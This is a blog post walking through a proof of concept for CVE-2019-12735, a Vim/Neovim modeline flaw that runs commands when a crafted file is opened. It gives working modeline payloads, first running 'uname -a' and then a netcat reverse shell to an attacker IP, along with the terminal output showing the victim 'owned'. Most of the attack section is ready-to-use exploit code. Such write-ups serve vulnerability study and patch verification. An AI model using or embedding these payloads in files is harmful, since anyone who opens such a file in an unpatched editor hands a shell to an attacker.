Exploit PoC: Linux command execution on Vim/Neovim vulnerability (CVE-2019–12735)

Magrabur Sofily
3 min readJun 11, 2019

--

Category: Remote Code Execution
Severity: High
Description:
The flaw resides in Linux Vim/Neovim editor in the way how those editors handle the “modelines” a feature that’s enabled by default to automatically find and apply a set of custom preferences as mentioned by the creator of a file at the starting and ending lines in a document. Therefore, just opening an innocent looking specially crafted malicious file using Vim or Neovim editor could allow attackers to execute commands on Linux system and ultimately take over the target system.

Affected Products:
• Vim before version 8.1.1365
• Neovim before version 0.3.6

Here is a step-by-step PoC of exploiting the vulnerability:

PoC Machine: I used my Kali Linux (4.17.8 x86_64) as the target machine for this purpose.
Victim machine IP: 172.31.242.25
Attacking machine IP: 172.31.242.143
PoC Summary:
1. Checked if the modeline option has not been disabled.
2. Quick PoC for command execution on vim editor.
3. Running a shell command for creating a reverse shell to own the target system.

Step-1: My Kali linux kernel details:
root@kali:~# cat /proc/version
Linux version 4.17.0-kali1-amd64 (devel@kali.org) (gcc version 7.3.0 (Debian 7.3.0–25)) #1 SMP Debian 4.17.8–1kali1 (2018–07–24)
root@kali:~#

Victim Kali machine details

Step-2: Set the modeline in vimrc file. Just add ‘:set modeline’ at the end of the file and save.
root@kali:~# tail -2 /etc/vim/vimrc

:set modeline
root@kali:~#

vimrc file

Step-3: Create a file cmdtest.txt with for command execution.
root@kali:~# cat cmdtest.txt
:!uname -a||” vi:fen:fdm=expr:fde=assert_fails(“source\!\ \%”):fdl=0:fdt=”
root@kali:~#

command execution file

Step-4: Now, open the above file using vim editor. It will throw output of ‘uname -a’. Hence, it is vulnerable.
root@kali:~# vim cmdtest.txt
Linux kali 4.17.0-kali1-amd64 #1 SMP Debian 4.17.8–1kali1 (2018–07–24) x86_64 GNU/Linux
Press ENTER or type command to continue

Successful command execution

Press Enter button, this will take you to Vim editor. Use ‘:q!’ to exit from it.

Step-5: Now comes the real fun part: Creating a reverse shell.
Create a new file or edit cmdtest.txt to overwrite a netcat reverse shell command instead of using the simple uname command.

Step-5.1: At attacker side:
Setting up a netcat listener on attacking machine.

Attacking machine setup

Step-5.2: At victim side: Prepare and run the exploit
I am creating a new file named ‘revshell.txt’ where I replaced the previous ‘uname -a’ command with a netcat simple reverse shell command.

root@kali:~# cat revshell.txt
:!nc -nv 172.31.242.143 4444 -e /bin/sh ||” vi:fen:fdm=expr:fde=assert_fails(“source\!\ \%”):fdl=0:fdt=”
root@kali:~#

Run the exploit

Step-5.3: Finally open the revshell.txt file using vim command and look at attacker machine for the reverse shell.

Victim side:
root@kali:~# vim revshell.txt
(UNKNOWN) [172.31.242.143] 4444 (?) open

Reverse shell created

Attacker side:

Successfully owned victim machine

--

--